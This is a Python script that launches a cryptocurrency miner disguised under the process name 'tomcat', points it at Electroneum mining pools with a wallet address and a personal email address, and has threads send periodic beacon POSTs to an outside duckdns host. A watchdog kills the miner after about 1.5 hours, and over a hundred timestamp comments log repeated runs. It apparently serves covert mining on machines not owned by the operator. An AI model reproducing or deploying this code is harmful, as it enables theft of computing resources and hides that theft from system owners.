import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:04.521746
#2018-02-17 17:25:07.911270
#2018-02-17 19:15:07.041956
#2018-02-17 21:03:01.491397
#2018-02-17 22:47:06.163743
#2018-02-18 00:32:03.857510
#2018-02-18 02:22:05.159082
#2018-02-18 04:09:01.259668
#2018-02-18 05:58:04.574482
#2018-02-18 07:50:05.017683
#2018-02-18 09:37:07.055619
#2018-02-18 11:24:07.887103
#2018-02-18 13:10:08.584509
#2018-02-18 14:58:01.995075
#2018-02-18 16:47:04.525006
#2018-02-18 18:35:02.990760
#2018-02-18 20:22:07.591828
#2018-02-18 22:08:05.523388
#2018-02-18 23:55:08.030199
#2018-02-19 01:43:04.503483
#2018-02-19 03:31:01.831526
#2018-02-19 05:15:07.035994
#2018-02-19 07:03:06.955145
#2018-02-19 08:52:02.228321
#2018-02-19 10:41:08.228742
#2018-02-19 12:28:05.483555
#2018-02-19 14:16:07.505706
#2018-02-19 16:05:09.798161
#2018-02-19 17:52:07.607572
#2018-02-19 19:38:01.714882
#2018-02-19 21:26:04.294415
#2018-02-19 23:12:07.135964
#2018-02-20 00:57:04.776245
#2018-02-20 02:48:06.194654
#2018-02-20 04:36:05.444184
#2018-02-20 06:20:04.924043
#2018-02-20 08:05:05.396573
#2018-02-20 09:50:07.232802
#2018-02-20 11:33:01.744274
#2018-02-20 13:19:06.886798
#2018-02-20 15:05:08.069197
#2018-02-20 16:51:03.615742
#2018-02-20 18:39:05.885821
#2018-02-20 20:29:03.962642
#2018-02-20 22:15:09.384844
#2018-02-20 23:57:06.591817
#2018-02-21 01:42:06.910479
#2018-02-21 03:30:09.014984
#2018-02-21 05:18:05.568024
#2018-02-21 07:06:07.245989
#2018-02-21 08:52:02.105627
#2018-02-21 10:40:08.305097
#2018-02-21 12:29:07.022764
#2018-02-21 14:15:08.203639
#2018-02-21 16:03:06.247148
#2018-02-21 17:53:04.541812
#2018-02-21 19:39:06.730917
#2018-02-21 21:27:02.119083
#2018-02-21 23:14:06.426907
#2018-02-22 01:05:06.164433
#2018-02-22 02:53:07.031973
#2018-02-22 04:40:03.240318
#2018-02-22 06:24:06.343167
#2018-02-22 08:11:06.811037
#2018-02-22 09:58:08.237773
#2018-02-22 11:43:04.336918
#2018-02-22 13:29:05.466899
#2018-02-22 15:17:04.809001
#2018-02-22 17:02:09.230173
#2018-02-22 18:50:08.350174
#2018-02-22 20:41:05.973005
#2018-02-22 22:28:03.723862
#2018-02-23 00:13:04.279862
#2018-02-23 02:00:01.607149
#2018-02-23 03:48:05.736035
#2018-02-23 05:36:06.290694
#2018-02-23 07:21:03.503553
#2018-02-23 09:25:08.193283
#2018-02-23 11:32:05.635899
#2018-02-23 13:23:01.886117
#2018-02-23 15:09:02.077393
#2018-02-23 16:58:06.785788
#2018-02-23 19:06:01.256874
#2018-02-23 20:50:10.544987
#2018-02-23 22:32:05.561860
#2018-02-24 00:19:01.739773
#2018-02-24 02:09:07.427233
#2018-02-24 03:59:06.729865
#2018-02-24 06:42:05.468549
#2018-02-24 08:31:04.978442
#2018-02-24 10:18:07.911267
#2018-02-24 12:13:06.281272
#2018-02-24 14:01:04.615782
#2018-02-24 15:52:06.519152
#2018-02-24 17:43:05.459989
#2018-02-24 19:29:06.304530
#2018-02-24 21:18:06.298168
#2018-02-24 23:56:06.426436
#2018-02-25 04:19:01.480639
#2018-02-25 07:49:04.804095